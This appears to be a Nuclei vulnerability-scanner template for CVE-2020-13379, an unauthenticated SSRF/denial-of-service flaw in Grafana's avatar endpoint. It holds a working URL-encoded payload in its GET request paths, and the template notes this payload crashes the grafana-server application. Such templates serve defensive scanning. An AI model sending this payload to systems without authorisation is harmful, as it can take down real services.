23 lines
794 B
YAML
23 lines
794 B
YAML
id: cve-2020-13379
|
|
|
|
info:
|
|
name: Unauthenticated Grafana DoS
|
|
author: pxmme1337
|
|
severity: medium
|
|
description: The avatar feature in Grafana 3.0.1 through 7.0.1 has an SSRF Incorrect Access Control issue. This vulnerability allows any unauthenticated user/client to make Grafana send HTTP requests to any URL and return its result to the user/client.
|
|
|
|
# Source:- https://www.exploit-db.com/exploits/48638
|
|
# WARNING
|
|
# This vulnerability results in complete crashing of the grafana-server application.
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
|
- '{{BaseURL}}/avatar/%7B%7Bprintf%20%22%25s%22%20%22this.Url%22%7D%7D'
|
|
- "{{BaseURL}}/"
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 502
|